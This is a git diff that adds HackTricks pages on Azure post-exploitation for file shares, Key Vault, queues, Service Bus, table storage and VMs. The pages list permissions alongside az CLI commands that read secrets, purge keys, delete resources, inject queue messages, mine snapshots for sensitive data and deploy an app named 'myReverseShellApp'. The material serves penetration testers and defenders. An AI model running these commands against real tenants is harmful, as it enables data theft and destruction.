+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md b/pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md new file mode 100644 index 0000000000..6176807e12 --- /dev/null +++ b/pentesting-cloud/azure-security/az-post-exploitation/az-file-share-post-exploitation.md @@ -0,0 +1,74 @@ +# Az - File Share Post Exploitation + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## File Share Privesc + +For more information about file shares check: + +{% content-ref url="../az-services/az-file-shares.md" %} +[az-file-shares.md](../az-services/az-file-shares.md) +{% endcontent-ref %} + +### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/read + +A principal with this permission will be able to **list** the files inside a file share and **download** the files which might contain **sensitive information**. + +```bash +# List files inside an azure file share +az storage file list \ + --account-name \ + --share-name \ + --auth-mode login --enable-file-backup-request-intent + +# Download an specific file +az storage file download \ + --account-name \ + --share-name \ + --path \ + --dest /path/to/down \ + --auth-mode login --enable-file-backup-request-intent +``` + +### Microsoft.Storage/storageAccounts/fileServices/fileshares/files/write, Microsoft.Storage/storageAccounts/fileServices/writeFileBackupSemantics/action + +A principal with this permission will be able to **write and overwrite files in file shares** which might allow him to cause some damage or even escalate privileges (e.g. overwrite some code stored in a file share): + +```bash +az storage blob upload \ + --account-name \ + --container-name \ + --file /tmp/up.txt --auth-mode login --overwrite +``` + +### \*/delete + +This would allow to delete file inside the shared filesystem which might **interrupt some services** or make the client **lose valuable information**. + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md b/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md new file mode 100644 index 0000000000..3308537236 --- /dev/null +++ b/pentesting-cloud/azure-security/az-post-exploitation/az-key-vault-post-exploitation.md @@ -0,0 +1,147 @@ +# Az - Key Vault Post Exploitation + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Azure Key Vault + +For more information about this service check: + +{% content-ref url="../az-services/keyvault.md" %} +[keyvault.md](../az-services/keyvault.md) +{% endcontent-ref %} + +### Microsoft.KeyVault/vaults/secrets/getSecret/action + +This permission will allow a principal to read the secret value of secrets: + +{% code overflow="wrap" %} +```bash +az keyvault secret show --vault-name --name + +# Get old version secret value +az keyvault secret show --id https://.vault.azure.net/secrets// +``` +{% endcode %} + +### **Microsoft.KeyVault/vaults/certificates/purge/action** + +This permission allows a principal to permanently delete a certificate from the vault. + +```bash +az keyvault certificate purge --vault-name --name +``` + +### **Microsoft.KeyVault/vaults/keys/encrypt/action** + +This permission allows a principal to encrypt data using a key stored in the vault. + +{% code overflow="wrap" %} +```bash +az keyvault key encrypt --vault-name --name --algorithm --value + +# Example +echo "HackTricks" | base64 # SGFja1RyaWNrcwo= +az keyvault key encrypt --vault-name testing-1231234 --name testing --algorithm RSA-OAEP-256 --value SGFja1RyaWNrcwo= +``` +{% endcode %} + +### **Microsoft.KeyVault/vaults/keys/decrypt/action** + +This permission allows a principal to decrypt data using a key stored in the vault. 
+ +{% code overflow="wrap" %} +```bash +az keyvault key decrypt --vault-name --name --algorithm --value + +# Example +az keyvault key decrypt --vault-name testing-1231234 --name testing --algorithm RSA-OAEP-256 --value "ISZ+7dNcDJXLPR5MkdjNvGbtYK3a6Rg0ph/+3g1IoUrCwXnF791xSF0O4rcdVyyBnKRu0cbucqQ/+0fk2QyAZP/aWo/gaxUH55pubS8Zjyw/tBhC5BRJiCtFX4tzUtgTjg8lv3S4SXpYUPxev9t/9UwUixUlJoqu0BgQoXQhyhP7PfgAGsxayyqxQ8EMdkx9DIR/t9jSjv+6q8GW9NFQjOh70FCjEOpYKy9pEGdLtPTrirp3fZXgkYfIIV77TXuHHdR9Z9GG/6ge7xc9XT6X9ciE7nIXNMQGGVCcu3JAn9BZolb3uL7PBCEq+k2rH4tY0jwkxinM45tg38Re2D6CEA==" # This is the result from the previous encryption +``` +{% endcode %} + +### **Microsoft.KeyVault/vaults/keys/purge/action** + +This permission allows a principal to permanently delete a key from the vault. + +```bash +az keyvault key purge --vault-name --name +``` + +### **Microsoft.KeyVault/vaults/secrets/purge/action** + +This permission allows a principal to permanently delete a secret from the vault. + +```bash +az keyvault secret purge --vault-name --name +``` + +### **Microsoft.KeyVault/vaults/secrets/setSecret/action** + +This permission allows a principal to create or update a secret in the vault. + +{% code overflow="wrap" %} +```bash +az keyvault secret set --vault-name --name --value +``` +{% endcode %} + +### **Microsoft.KeyVault/vaults/certificates/delete** + +This permission allows a principal to delete a certificate from the vault. The certificate is moved to the "soft-delete" state, where it can be recovered unless purged. + +{% code overflow="wrap" %} +```bash +az keyvault certificate delete --vault-name --name +``` +{% endcode %} + +### **Microsoft.KeyVault/vaults/keys/delete** + +This permission allows a principal to delete a key from the vault. The key is moved to the "soft-delete" state, where it can be recovered unless purged. 
+ +```bash +az keyvault key delete --vault-name --name +``` + +### **Microsoft.KeyVault/vaults/secrets/delete** + +This permission allows a principal to delete a secret from the vault. The secret is moved to the "soft-delete" state, where it can be recovered unless purged. + +```bash +az keyvault secret delete --vault-name --name +``` + +### Microsoft.KeyVault/vaults/secrets/restore/action + +This permission allows a principal to restore a secret from a backup. + +```bash +az keyvault secret restore --vault-name --file +``` + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md b/pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md new file mode 100644 index 0000000000..15a9a939d3 --- /dev/null +++ b/pentesting-cloud/azure-security/az-post-exploitation/az-queue-post-exploitation.md @@ -0,0 +1,129 @@ +# Az - Queue Storage Post Exploitation + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Queue + +For more information check: + +{% content-ref url="../az-services/az-queue-enum.md" %} +[az-queue-enum.md](../az-services/az-queue-enum.md) +{% endcontent-ref %} + +### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/read` + +An attacker with this permission can peek messages from an Azure Storage Queue. This allows the attacker to view the content of messages without marking them as processed or altering their state. This could lead to unauthorized access to sensitive information, enabling data exfiltration or gathering intelligence for further attacks. + +{% code overflow="wrap" %} +```bash +az storage message peek --queue-name --account-name +``` +{% endcode %} + +**Potential Impact**: Unauthorized access to the queue, message exposure, or queue manipulation by unauthorized users or services. + +### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/process/action` + +With this permission, an attacker can retrieve and process messages from an Azure Storage Queue. This means they can read the message content and mark it as processed, effectively hiding it from legitimate systems. This could lead to sensitive data being exposed, disruptions in how messages are handled, or even stopping important workflows by making messages unavailable to their intended users. + +{% code overflow="wrap" %} +```bash +az storage message get --queue-name --account-name +``` +{% endcode %} + +### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/add/action` + +With this permission, an attacker can add new messages to an Azure Storage Queue. This allows them to inject malicious or unauthorized data into the queue, potentially triggering unintended actions or disrupting downstream services that process the messages. 
+ +{% code overflow="wrap" %} +```bash +az storage message put --queue-name --content "Injected malicious message" --account-name +``` +{% endcode %} + +### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/write` + +This permission allows an attacker to add new messages or update existing ones in an Azure Storage Queue. By using this, they could insert harmful content or alter existing messages, potentially misleading applications or causing undesired behaviors in systems that rely on the queue. + +{% code overflow="wrap" %} +```bash +az storage message put --queue-name --content "Injected malicious message" --account-name + +#Update the message +az storage message update --queue-name \ + --id \ + --pop-receipt \ + --content "Updated message content" \ + --visibility-timeout \ + --account-name +``` +{% endcode %} + +### Actions: `Microsoft.Storage/storageAccounts/queueServices/queues/delete` + +This permission allows an attacker to delete queues within the storage account. By leveraging this capability, an attacker can permanently remove queues and all their associated messages, causing significant disruption to workflows and resulting in critical data loss for applications that rely on the affected queues. This action can also be used to sabotage services by removing essential components of the system. + +{% code overflow="wrap" %} +```bash +az storage queue delete --name --account-name +``` +{% endcode %} + +### DataActions: `Microsoft.Storage/storageAccounts/queueServices/queues/messages/delete` + +With this permission, an attacker can clear all messages from an Azure Storage Queue. This action removes all messages, disrupting workflows and causing data loss for systems dependent on the queue. 
+ +{% code overflow="wrap" %} +```bash +az storage message clear --queue-name --account-name +``` +{% endcode %} + +### Actions: `Microsoft.Storage/storageAccounts/queueServices/queues/write` + +This permission allows an attacker to create or modify queues and their properties within the storage account. It can be used to create unauthorized queues, modify metadata, or change access control lists (ACLs) to grant or restrict access. This capability could disrupt workflows, inject malicious data, exfiltrate sensitive information, or manipulate queue settings to enable further attacks. + +{% code overflow="wrap" %} +```bash +az storage queue create --name --account-name + +az storage queue metadata update --name --metadata key1=value1 key2=value2 --account-name + +az storage queue policy set --name --permissions rwd --expiry 2024-12-31T23:59:59Z --account-name +``` +{% endcode %} + +## References + +* https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues +* https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api +* https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md b/pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md new file mode 100644 index 0000000000..f0f7613da6 --- /dev/null +++ b/pentesting-cloud/azure-security/az-post-exploitation/az-servicebus-post-exploitation.md @@ -0,0 +1,140 @@ +# Az - Service Bus Post Exploitation + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Service Bus + +For more information check: + +{% content-ref url="../az-services/az-servicebus-enum.md" %} +[az-servicebus-enum.md](../az-services/az-servicebus-enum.md) +{% endcontent-ref %} + +### Actions: `Microsoft.ServiceBus/namespaces/Delete` + +An attacker with this permission can delete an entire Azure Service Bus namespace. This action removes the namespace and all associated resources, including queues, topics, subscriptions, and their messages, causing widespread disruption and permanent data loss across all dependent systems and workflows. + +{% code overflow="wrap" %} +```bash +az servicebus namespace delete --resource-group --name +``` +{% endcode %} + +### Actions: `Microsoft.ServiceBus/namespaces/topics/Delete` + +An attacker with this permission can delete an Azure Service Bus topic. This action removes the topic and all its associated subscriptions and messages, potentially causing loss of critical data and disrupting systems and workflows relying on the topic. + +{% code overflow="wrap" %} +```bash +az servicebus topic delete --resource-group --namespace-name --name +``` +{% endcode %} + +### Actions: `Microsoft.ServiceBus/namespaces/queues/Delete` + +An attacker with this permission can delete an Azure Service Bus queue. This action removes the queue and all the messages within it, potentially causing loss of critical data and disrupting systems and workflows dependent on the queue. + +{% code overflow="wrap" %} +```bash +az servicebus queue delete --resource-group --namespace-name --name +``` +{% endcode %} + +### Actions: `Microsoft.ServiceBus/namespaces/topics/subscriptions/Delete` + +An attacker with this permission can delete an Azure Service Bus subscription. This action removes the subscription and all its associated messages, potentially disrupting workflows, data processing, and system operations relying on the subscription. 
+ +{% code overflow="wrap" %} +```bash +az servicebus topic subscription delete --resource-group --namespace-name --topic-name --name +``` +{% endcode %} + +### Actions: `Microsoft.ServiceBus/namespaces/write` & `Microsoft.ServiceBus/namespaces/read` + +An attacker with permissions to create or modify Azure Service Bus namespaces can exploit this to disrupt operations, deploy unauthorized resources, or expose sensitive data. They can alter critical configurations such as enabling public network access, downgrading encryption settings, or changing SKUs to degrade performance or increase costs. Additionally, they could disable local authentication, manipulate replica locations, or adjust TLS versions to weaken security controls, making namespace misconfiguration a significant post-exploitation risk. + +{% code overflow="wrap" %} +```bash +az servicebus namespace create --resource-group --name --location +az servicebus namespace update --resource-group --name --tags +``` +{% endcode %} + + +### Actions: `Microsoft.ServiceBus/namespaces/queues/write` (`Microsoft.ServiceBus/namespaces/queues/read`) + +An attacker with permissions to create or modify Azure Service Bus queues (to modiffy the queue you will also need the Action:`Microsoft.ServiceBus/namespaces/queues/read`) can exploit this to intercept data, disrupt workflows, or enable unauthorized access. They can alter critical configurations such as forwarding messages to malicious endpoints, adjusting message TTL to retain or delete data improperly, or enabling dead-lettering to interfere with error handling. Additionally, they could manipulate queue sizes, lock durations, or statuses to disrupt service functionality or evade detection, making this a significant post-exploitation risk. 
+ +{% code overflow="wrap" %} +```bash +az servicebus queue create --resource-group --namespace-name --name +az servicebus queue update --resource-group --namespace-name --name +``` +{% endcode %} + +### Actions: `Microsoft.ServiceBus/namespaces/topics/write` (`Microsoft.ServiceBus/namespaces/topics/read`) + +An attacker with permissions to create or modify topics (to modiffy the topic you will also need the Action:`Microsoft.ServiceBus/namespaces/topics/read`) within an Azure Service Bus namespace can exploit this to disrupt message workflows, expose sensitive data, or enable unauthorized actions. Using commands like az servicebus topic update, they can manipulate configurations such as enabling partitioning for scalability misuse, altering TTL settings to retain or discard messages improperly, or disabling duplicate detection to bypass controls. Additionally, they could adjust topic size limits, change status to disrupt availability, or configure express topics to temporarily store intercepted messages, making topic management a critical focus for post-exploitation mitigation. + +{% code overflow="wrap" %} +```bash +az servicebus topic create --resource-group --namespace-name --name +az servicebus topic update --resource-group --namespace-name --name +``` +{% endcode %} + +### Actions: `Microsoft.ServiceBus/namespaces/topics/subscriptions/write` (`Microsoft.ServiceBus/namespaces/topics/subscriptions/read`) + +An attacker with permissions to create or modify subscriptions (to modiffy the subscription you will also need the Action: `Microsoft.ServiceBus/namespaces/topics/subscriptions/read`) within an Azure Service Bus topic can exploit this to intercept, reroute, or disrupt message workflows. Using commands like az servicebus topic subscription update, they can manipulate configurations such as enabling dead lettering to divert messages, forwarding messages to unauthorized endpoints, or modifying TTL and lock duration to retain or interfere with message delivery. 
Additionally, they can alter status or max delivery count settings to disrupt operations or evade detection, making subscription control a critical aspect of post-exploitation scenarios. + + +{% code overflow="wrap" %} +```bash +az servicebus topic subscription create --resource-group --namespace-name --topic-name --name +az servicebus topic subscription update --resource-group --namespace-name --topic-name --name +``` +{% endcode %} + + +### Actions: `AuthorizationRules` Send & Recive Messages + +Take a look here: + +{% content-ref url="../az-services/az-queue-privesc.md" %} +[az-queue-privesc.md](../az-services/az-queue-privesc.md) +{% endcontent-ref %} + +## References + +* https://learn.microsoft.com/en-us/azure/storage/queues/storage-powershell-how-to-use-queues +* https://learn.microsoft.com/en-us/rest/api/storageservices/queue-service-rest-api +* https://learn.microsoft.com/en-us/azure/storage/queues/queues-auth-abac-attributes +* https://learn.microsoft.com/en-us/azure/service-bus-messaging/service-bus-python-how-to-use-topics-subscriptions?tabs=passwordless +* https://learn.microsoft.com/en-us/azure/role-based-access-control/permissions/integration#microsoftservicebus +* https://learn.microsoft.com/en-us/cli/azure/servicebus/namespace?view=azure-cli-latest +* https://learn.microsoft.com/en-us/cli/azure/servicebus/queue?view=azure-cli-latest + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md b/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md new file mode 100644 index 0000000000..50e25c217f --- /dev/null +++ b/pentesting-cloud/azure-security/az-post-exploitation/az-table-storage-post-exploitation.md @@ -0,0 +1,90 @@ +# Az - Table Storage Post Exploitation + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## Table Storage Privesc + +For more information about table storage check: + +{% content-ref url="../az-services/az-table-storage.md" %} +[az-table-storage.md](../az-services/az-table-storage.md) +{% endcontent-ref %} + +### Microsoft.Storage/storageAccounts/tableServices/tables/entities/read + +A principal with this permission will be able to **list** the tables inside a table storage and **read the info** which might contain **sensitive information**. + +```bash +# List tables +az storage table list --auth-mode login --account-name + +# Read table (top 10) +az storage entity query \ + --account-name \ + --table-name \ + --auth-mode login \ + --top 10 +``` + +### Microsoft.Storage/storageAccounts/tableServices/tables/entities/write | Microsoft.Storage/storageAccounts/tableServices/tables/entities/add/action | Microsoft.Storage/storageAccounts/tableServices/tables/entities/update/action + +A principal with this permission will be able to **write and overwrite entries in tables** which might allow him to cause some damage or even escalate privileges (e.g. overwrite some trusted data that could abuse some injection vulnerability in the app using it). + +* The permission `Microsoft.Storage/storageAccounts/tableServices/tables/entities/write` allows all the actions. 
+* The permission `Microsoft.Storage/storageAccounts/tableServices/tables/entities/add/action` allows to **add** entries +* The permission `Microsoft.Storage/storageAccounts/tableServices/tables/entities/update/action` allows to **update** existing entries + +```bash +# Add +az storage entity insert \ + --account-name \ + --table-name \ + --auth-mode login \ + --entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager" + +# Replace +az storage entity replace \ + --account-name \ + --table-name \ + --auth-mode login \ + --entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager" + +# Update +az storage entity merge \ + --account-name \ + --table-name \ + --auth-mode login \ + --entity PartitionKey=HR RowKey=12345 Name="John Doe" Age=30 Title="Manager" +``` + +### \*/delete + +This would allow to delete file inside the shared filesystem which might **interrupt some services** or make the client **lose valuable information**. + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} diff --git a/pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md b/pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md new file mode 100644 index 0000000000..08e4f5319b --- /dev/null +++ b/pentesting-cloud/azure-security/az-post-exploitation/az-vms-and-network-post-exploitation.md @@ -0,0 +1,210 @@ +# Az - VMs & Network Post Exploitation + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
+{% endhint %} + +## VMs & Network + +For more info about Azure VMs and networking check the following page: + +{% content-ref url="../az-services/vms/" %} +[vms](../az-services/vms/) +{% endcontent-ref %} + +### VM Application Pivoting + +VM applications can be shared with other subscriptions and tenants. If an application is being shared it's probably because it's being used. So if the attacker manages to **compromise the application and uploads a backdoored** version it might be possible that it will be **executed in another tenant or subscription**. + +### Sensitive information in images + +It might be possible to find **sensitive information inside images** taken from VMs in the past. + +1. **List images** from galleries + +```bash +# Get galleries +az sig list -o table + +# List images inside gallery +az sig image-definition list \ + --resource-group \ + --gallery-name \ + -o table + +# Get images versions +az sig image-version list \ + --resource-group \ + --gallery-name \ + --gallery-image-definition \ + -o table +``` + +2. **List custom images** + +```bash +az image list -o table +``` + +3. **Create VM from image ID** and search for sensitive info inside of it + +```bash +# Create VM from image +az vm create \ + --resource-group \ + --name \ + --image /subscriptions//resourceGroups//providers/Microsoft.Compute/galleries//images//versions/ \ + --admin-username \ + --generate-ssh-keys +``` + +### Sensitive information in restore points + +It might be possible to find **sensitive information inside restore points**. + +1. **List restore points** + +```bash +az restore-point list \ + --resource-group \ + --restore-point-collection-name \ + -o table +``` + +2. **Create a disk** from a restore point + +{% code overflow="wrap" %} +```bash +az disk create \ + --resource-group \ + --name \ + --source /subscriptions//resourceGroups//providers/Microsoft.Compute/restorePointCollections//restorePoints/ +``` +{% endcode %} + +3. 
**Attach the disk to a VM** (the attacker needs to have compromised a VM inside the account already) + +```bash +az vm disk attach \ + --resource-group \ + --vm-name \ + --name +``` + +4. **Mount** the disk and **search for sensitive info** + +{% tabs %} +{% tab title="Linux" %} +```bash +# List all available disks +sudo fdisk -l + +# Check disk format +sudo file -s /dev/sdX + +# Mount it +sudo mkdir /mnt/mydisk +sudo mount /dev/sdX1 /mnt/mydisk +``` +{% endtab %} + +{% tab title="Windows" %} +#### **1. Open Disk Management** + +1. Right-click **Start** and select **Disk Management**. +2. The attached disk should appear as **Offline** or **Unallocated**. + +#### **2. Bring the Disk Online** + +1. Locate the disk in the bottom pane. +2. Right-click the disk (e.g., **Disk 1**) and select **Online**. + +#### **3. Initialize the Disk** + +1. If the disk is not initialized, right-click and select **Initialize Disk**. +2. Choose the partition style: + * **MBR** (Master Boot Record) or **GPT** (GUID Partition Table). GPT is recommended for modern systems. + +#### **4. Create a New Volume** + +1. Right-click the unallocated space on the disk and select **New Simple Volume**. +2. Follow the wizard to: + * Assign a drive letter (e.g., `D:`). + * Format the disk (choose NTFS for most cases). +{% endtab %} +{% endtabs %} + +### Sensitive information in disks & snapshots + +It might be possible to find **sensitive information inside disks or even old disk's snapshots**. + +1. **List snapshots** + +```bash +az snapshot list \ + --resource-group \ + -o table +``` + +2. **Create disk from snapshot** (if needed) + +```bash +az disk create \ + --resource-group \ + --name \ + --source \ + --size-gb +``` + +3. 
**Attach and mount the disk** to a VM and search for sensitive information (check the previous section to see how to do this) + +### Sensitive information in VM Extensions & VM Applications + +It might be possible to find **sensitive information inside VM extensions and VM applications**. + +1. **List all VM apps** + +{% code overflow="wrap" %} +```bash +## List all VM applications inside a gallery +az sig gallery-application list --gallery-name --resource-group --output table +``` +{% endcode %} + +2. Install the extension in a VM and **search for sensitive info** + +{% code overflow="wrap" %} +```bash +az vm application set \ + --resource-group \ + --name \ + --app-version-ids /subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.Compute/galleries/myGallery/applications/myReverseShellApp/versions/1.0.2 \ + --treat-deployment-as-failure true +``` +{% endcode %} + +{% hint style="success" %} +Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ +Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) + +
+ +Support HackTricks + +* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! +* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** +* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. + +
